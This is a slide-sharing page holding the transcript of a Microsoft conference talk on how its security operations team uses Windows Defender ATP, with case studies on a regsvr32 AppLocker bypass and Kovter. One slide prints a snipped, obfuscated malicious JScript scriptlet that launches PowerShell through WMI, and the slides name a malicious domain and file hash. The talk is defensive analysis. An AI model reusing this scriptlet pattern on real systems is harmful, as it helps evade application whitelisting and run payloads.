How Microsoft uses Windows Defender ATP–Welcome to a SecOps world!

Slides:



Advertisements
Similar presentations
MIX 09 4/15/ :14 PM © 2009 Microsoft Corporation. All rights reserved. Microsoft, Windows, Windows Vista and other product names are or may be registered.
Advertisements

Session 1.
Built by Developers for Developers…. © 2009 Microsoft Corporation. All rights reserved. Microsoft, Windows, Windows Vista and other product names.
© 2012 Microsoft Corporation. All rights reserved. Microsoft, Windows, Windows Vista and other product names are or may be registered trademarks and/or.
© 2009 Microsoft Corporation. All rights reserved. Microsoft, Windows, Windows Vista and other product names are or.

© 2009 Microsoft Corporation. All rights reserved. Microsoft, Windows, Windows Vista and other product names are or may be registered trademarks.
© 2008 Microsoft Corporation. All rights reserved. Microsoft, Windows, Windows Vista and other product names are or.

MIX 09 4/17/2018 4:41 PM © 2009 Microsoft Corporation. All rights reserved. Microsoft, Windows, Windows Vista and other product names are or may be registered.
Azure Machine Learning Deploying and Managing Models in production
Azure on Steroids: Full Automation with PowerShell
Cloud Security IS Application-Centric Security
6/5/2018 1:30 PM THR1029 Spend less time managing data and more time with customers: Quick tour of Outlook Customer Manager Welly Lee
6/10/2018 5:07 PM THR2218 Deploying Windows Defender AV and more with Intune and Configuration Manager Amitai Senior Program Manager,
Azure Cloud Shell Magic of Modern Command-line Management
6/19/2018 2:57 AM THR3092 Monitor and investigate actions on your user and data with alerts, insights and reports Binyan Chen Program Manager II, Office.
Do more with Microsoft Word and Office 365
Optimizing Microsoft OneDrive for the enterprise
What a Real, Functioning DevOps Team Looks Like
Virtual Machine Diagnostics in Microsoft Azure
SQL Server on Linux on All-Flash Arrays
Understanding Windows Analytics Update Compliance
Excel and Power BI Better Together Democratization of data
Workflow Orchestration with Adobe I/O
How we got a traditional bank collaborating across boundaries
The utility belt for managing security and compliance in Office 365
Find, try and get line-of-business apps on Microsoft AppSource
Automated Response with Windows Defender ATP
9/12/2018 7:18 AM THR1081 Don’t be the first victim of new malware Turn Windows Defender AV Cloud Protection on! Amitai Senior Program.
Azure Security in four steps
Automate all things! Microsoft Azure continuous deployment
9/22/2018 3:49 AM BRK2247 Learn from MVPs: Panel discussion on all things SharePoint and OneDrive © Microsoft Corporation. All rights reserved. MICROSOFT.
Confidence at speed: Visual Studio 2017 and your CI pipeline
Azure PowerShell Aaron Roney Senior Program Manager Cormac McCarthy
11/22/2018 1:43 PM THR3005 How to provide business insight from your data using Azure Analysis Services Peter Myers Bitwise Solutions © Microsoft Corporation.
Continuous Delivery with Visual Studio Team Services
Azure Advisor: Optimization in the best way
Mobile Center and VSTS:​ Better together for your Mobile DevOps
12/5/2018 2:50 AM How to secure your front door with real-time risk assessments of your logons Jan Ketil Skanke COO and Principal Cloud Architect CloudWay.
Title of Presentation 12/2/2018 3:48 PM
Microsoft products for non-profits
Automating security for better, continuous compliance in the cloud
Introduction to ASP.NET Core 1.0
Five cool things you can do with Windows PowerShell on Office 365
Microsoft To-Do Preview
Microsoft Exchange: Through the eyes of MVPs (Panel discussion)
MDM Migration Analysis Tool (MMAT)
Overview: Dynamics 365 for Project Service Automation
Understand your Azure cloud assets dependencies with BMC Discovery
Surviving identity management in a hybrid world
Sami Laiho AMA - Ask Me Anything
Breaking Down the Value of A Yammer Post: 20 Things to Do
8/04/2019 9:13 PM © 2006 Microsoft Corporation. All rights reserved. Microsoft, Windows, Windows Vista and other product names are or may be registered.
Cool Microsoft Edge Tips and Tricks
When Bad Things Happen to Good Applications
Getting the most out of Azure resources with Azure Advisor
“Hey Mom, I’ll Fix Your Computer”
4/21/2019 7:09 AM THR2098 Unlock New Opportunities with Nintex Hawkeye Process Intelligence and Workflow Analytics Sr. Product.
Consolidate, manage, backup, and secure your cloud content
Designing Bots that Fit Your Organization
Ask the Experts: Windows 10 deployment and servicing
Passwordless Service Accounts
Azure Networking inside and out
Digital Transformation: Putting the Jigsaw Together
WCF and .NET Framework Microservices in Containers
Diagnostics and troubleshooting in Azure App Service Support Center
Optimizing your content for search and discovery
Title of Presentation 5/24/2019 1:26 PM
Presentation transcript:

How Microsoft uses Windows Defender ATP–Welcome to a SecOps world! 5/27/2018 3:50 PM BRK2060 How Microsoft uses Windows Defender ATP–Welcome to a SecOps world! Brian Hooper Senior Security Analyst Microsoft | Digital Security & Risk Engineering © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | where we fit. 5/27/2018 3:50 PM DSRE Security Monitoring | where we fit. Cyber Defense Operations Center Cyber Security Services Engineering Digital Crimes Unit Digital Security & Risk Engineering Microsoft Azure (C+E Security) Microsoft Security Response Center (C+E Security) Microsoft Threat Intelligence Center (MSTIC) Office 365 Windows & Devices Group © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | how we are structured. 5/27/2018 3:50 PM DSRE Security Monitoring | how we are structured. SOC Structure SOC Data Sources TIER 1 24x7 Automated alerting (SIEM) Human alerting (User reporting) Proactive mitigation Remediation & Tracking Host Network FW++ IDS++ TIER 2 20x5 + On-call Tier 1 Escalations; L2 Analysis Automated alerting (SIEM) Windows Defender ATP Rapid Investigations Consoles TIER 3 16x5 + On-call Tier 2 Escalations; L3 Analysis Root Cause Analysis of Major Incidents Hunting, Alert Tuning, & PG Feedback Workflow Automation Operationalize the Threat SIEM Big Data (Queries & Analytics) SOC Engineering SIEM content + Ops/Maintenance (O&M) Network FW, IDS content + O&M SOC Design Monitoring Use Cases © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | why endpoint monitoring is hard. 5/27/2018 3:50 PM DSRE Security Monitoring | why endpoint monitoring is hard. Massive Scale 250K+ active users 300K+ active mailboxes 500K+ active workstations [not including mobile devices] Forward-leaning in OS > even more data per device Cloud First Highly Mobile Boundary shifts Device usage shifts BYOAnything © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | how Defender ATP helps. 5/27/2018 3:50 PM DSRE Security Monitoring | how Defender ATP helps. Management Monitoring DEPLOY AND MANAGE Built-in agent, low effort onboarding, no on-prem infrastructure CONNECTIVITY An always-on service for our always connected devices SCALE We have data from all 500K systems and it grows as we grow PRECISION Intelligent, actionable alerts fueled by Microsoft security experts SPEED Rapid host triage and deep event timeline for investigations EFFICIENCY Enables focused response and enterprise containment © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

Case Study 1: regsvr32.exe 5/27/2018 3:50 PM © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 1 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 1 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 1 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 1 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 1 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 1 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) From the article: Our alert: From: https://betanews.com/2016/04/25/bypass-applocker-security/ © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 1 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) From: https://www.virustotal.com/#/domain/server1.aserdefa.ru © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 1 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) From: https://www.virustotal.com/#/file/9da91192004c51a1315773cb56c1dc6e2cef8b55e66e61d7c1c40d5b3c266cb2/detection © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 1 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) From: https://www.virustotal.com/#/file/9da91192004c51a1315773cb56c1dc6e2cef8b55e66e61d7c1c40d5b3c266cb2/detection © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 1 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 1 (cont.) XML version="1.0" <scriptlet> <registration progid="CLASS" classid=" F3011114-0000-0000-0000-4030F1ED1CDC <script language="JScript"> [CDATA[ <SNIP> wshel=new ActiveXObject(_0xd5bd('0x1b')) fso=new ActiveXObject(_0xd5bd('0x1c')) if(is_ps_installed() is_dotnet_installed()) wmi_create_process(pspath _0xd5bd('0x1d') '\x2f\x70\x31\x27\x29\x29',showexec) catch(_0x5babc9) </script> </registration> </scriptlet> From: https://www.virustotal.com/#/file/9da91192004c51a1315773cb56c1dc6e2cef8b55e66e61d7c1c40d5b3c266cb2/detection © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

Case Study 2: Kovter 5/27/2018 3:50 PM © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 2 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 2 © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 2 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 2 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 2 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 2 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 2 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 2 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 2 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 2 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 2 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 2 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

DSRE Security Monitoring | Case Study 2 (cont.) 5/27/2018 3:50 PM DSRE Security Monitoring | Case Study 2 (cont.) © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

5/27/2018 3:50 PM Questions? © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

Please evaluate this session Tech Ready 15 5/27/2018 Please evaluate this session From your Please expand notes window at bottom of slide and read. Then Delete this text box. PC or tablet: visit MyIgnite https://myignite.microsoft.com/evaluations Phone: download and use the Microsoft Ignite mobile app https://aka.ms/ignite.mobileapp Your input is important! © 2012 Microsoft Corporation. All rights reserved. Microsoft, Windows, Windows Vista and other product names are or may be registered trademarks and/or trademarks in the U.S. and/or other countries. The information herein is for informational purposes only and represents the current view of Microsoft Corporation as of the date of this presentation. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information provided after the date of this presentation. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

5/27/2018 3:50 PM © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.